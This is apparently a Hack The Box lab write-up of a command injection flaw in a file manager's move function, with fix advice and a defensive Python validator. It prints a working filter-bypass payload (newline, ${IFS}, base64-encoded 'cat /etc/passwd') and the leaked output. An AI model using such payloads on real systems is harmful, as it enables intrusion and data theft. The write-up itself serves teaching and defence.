💉 Command Injection in Move File Function Allows Reading Server Files (HTB)
CWE:
- CWE-77: Improper Neutralization of Special Elements used in a Command (Command Injection)
- CWE-20: Improper Input Validation
CVSS (Estimated):
Base Score: 8.6 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Overview:
A command injection vulnerability was discovered in the "Move File" functionality of the web application hosted at http://94.237.53.203:49711. This issue allows an authenticated normal user to execute arbitrary system commands by manipulating the `to` parameter in a GET request during the file move operation. By exploiting this, an attacker can read sensitive server files, including `/etc/passwd`, without needing elevated privileges.
Impact:
- Command Execution: Enables arbitrary shell commands to be executed on the server.
- Information Disclosure: Attackers can read sensitive system files, such as `/etc/passwd`.
- Privilege Escalation Path: While the attacker initially has user-level access, the ability to read system files may aid in further exploitation.
- Weak Authorization Controls: Demonstrates insufficient validation of user-supplied parameters, exposing server internals.
Fix:
- Strictly validate all user input on server-side functions, particularly those interacting with the file system or shell commands.
- Disallow special characters such as `;`, `|`, `&`, and `$` in parameters unless strictly necessary and safe.
- Use parameterized or safe shell execution libraries (e.g., `escapeshellarg()` or equivalent functions).
- Escape and sanitize all user input before embedding it in shell commands.
- Implement logging and alerting for abnormal file access or command execution behavior.
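As an added example (not part of this writeup or of the target application), the following Python applies the allowlist rule from the Fix section to the `to` parameter and produces the alert data the logging bullet calls for, run over constructed request lines modelled on the requests shown in this report. The request format, the `from`/`to`/`move`/`finish` parameters and the `${IFS}` indicator come from the page; the sample lines themselves are constructed, and an allowlist is used rather than the blocklist the report shows being bypassed.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed request lines modelled on the requests shown in this writeup: a benign
# move with a real name, the empty 'to' of the intercepted request, the ';whoami'
# probe and the newline/${IFS} payload. Sample data, not from any real log.
SAMPLE_REQUESTS = [
    "GET /index.php?to=backup.txt&from=2561732172.txt&finish=1&move=1 HTTP/1.1",
    "GET /index.php?to=&from=2561732172.txt&finish=1&move=1 HTTP/1.1",
    "GET /index.php?to=;whoami&from=2561732172.txt&finish=1&move=1 HTTP/1.1",
    'GET /index.php?to=%0Aba"s"h<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dk)'
    "&from=2561732172.txt&finish=1&move=1 HTTP/1.1",
]

# Positive allowlist for a destination name (the Fix section's validation rule):
# one bare file name, so there is no blocklist for a new trick to slip past.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
# Indicators to report when a value fails the allowlist: ${IFS} first so it is
# reported whole; the class covers newline (%0A), separators, quotes, redirects.
SHELL_META = re.compile(r"\$\{IFS\}|[\n\r;|&$`<>\"'(){}*?\\]")

def validate_move_target(name: str) -> bool:
    """True only for a name the allowlist accepts; everything else is rejected."""
    return SAFE_NAME.fullmatch(name) is not None

def query_params(request_line: str) -> dict:
    """Split the query by hand (so ';' in a value stays data) and percent-decode."""
    target = request_line.split(" ")[1]
    params = {}
    for pair in target.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)  # %0A becomes a real newline here
    return params

def flag_move_request(request_line: str) -> Optional[List[str]]:
    """None if not a move or 'to' passes; else sorted shell indicators found in 'to'
    (an empty list means rejected by the allowlist without shell syntax)."""
    params = query_params(request_line)
    if params.get("move") != "1" or "to" not in params:
        return None
    if validate_move_target(params["to"]):
        return None
    return sorted({m.group(0) for m in SHELL_META.finditer(params["to"])})

def scan(lines: List[str]) -> List[dict]:
    """One alert record per request whose 'to' value failed validation."""
    flagged = ((req, flag_move_request(req)) for req in lines)
    return [{"request": r, "indicators": h} for r, h in flagged if h is not None]
```

The decode step matters: matching on the raw query string would miss the `%0A` newline that made the page's second payload work, while `to=;whoami` is caught either way.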
Detailed Exploitation Steps:
1. Navigate to the Target Application:
   - Open your browser and go to http://94.237.53.203:49711
   - Log in as a normal user (no admin privileges required).
   - You will be directed to a basic file manager interface listing the files that the user owns.
2. Identify the "Copy/Move" File Icon:
   - Next to each file there is an icon that allows the user to copy or move that file to another location.
   - When clicked, this icon sends a GET request to the server with the parameters `from`, `to`, `move`, and `finish`.
3. Intercept the Request in Burp Suite:
   - Using Burp Suite, click the move icon and intercept the request.
   - The typical request looks like:
     ```
     GET /index.php?to=&from=2561732172.txt&finish=1&move=1 HTTP/1.1
     Host: 94.237.53.203:49711
     ```
   - This indicates the server is performing a backend command like:
     ```bash
     mv /var/www/html/files/2561732172.txt /var/www/html/files/{to}
     ```
4. Attempt Command Injection (Initial Test):
   - Modify the `to` parameter with a simple command injection payload:
     ```
     to=;whoami
     ```
   - Result: Blocked; likely due to basic filtering or the lack of newline/space injection.
5. Bypass Filters Using Encoded Payloads (Successful Exploitation):
   - Use newline and special-character injection to bypass the command filtering:
     ```
     GET /index.php?to=%0Aba"s"h<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dk)&from=2561732172.txt&finish=1&move=1
     ```
   - Explanation of payload:
     - `%0A` is a newline character, so everything after it is parsed as a new command rather than as part of the `mv` destination.
     - `ba"s"h<<<...` is `bash` with its word split by quotes (the shell removes them before execution), fed a here-string, so the filter's view of the text differs from what the shell runs.
     - `${IFS}` is the shell's internal field separator (a space by default), used where the request contains no literal space.
     - `$(base64 -d <<< ...)` decodes the base64-encoded string: `Y2F0IC9ldGMvcGFzc3dk` = `cat /etc/passwd`.
   - This ultimately executes:
     ```
     cat /etc/passwd
     ```
6. Observe the Response (Sensitive Data Leaked):
   - The server response contains the following:
     ```
     Error while moving: mv: '/var/www/html/files/2561732172.txt' and '/var/www/html/files/2561732172.txt' are the same file
     <br>
     root:x:0:0:root:/root:/bin/bash
     <br>
     daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
     <br>
     bin:x:2:2:bin:/bin:/usr/sbin/nologin
     <br>
     ...
     <br>
     mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
     <br>
     sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
     ```
   - The `mv` error is consistent with the inferred backend command above: the injected newline ends the `mv` command with the bare `/var/www/html/files/` directory as its destination, so the file is moved onto itself, and the remainder of the line then runs as a separate command whose output is appended to the response.
   - This confirms that arbitrary shell command execution is possible and that sensitive OS files can be accessed.
Conclusion:
This command injection vulnerability in the file manager's "move file" function poses a severe threat. It enables normal authenticated users to execute arbitrary shell commands through the `to` parameter, leading to unauthorized access to critical server files. Left unpatched, it exposes the system to further exploitation, data leaks, and potential privilege escalation.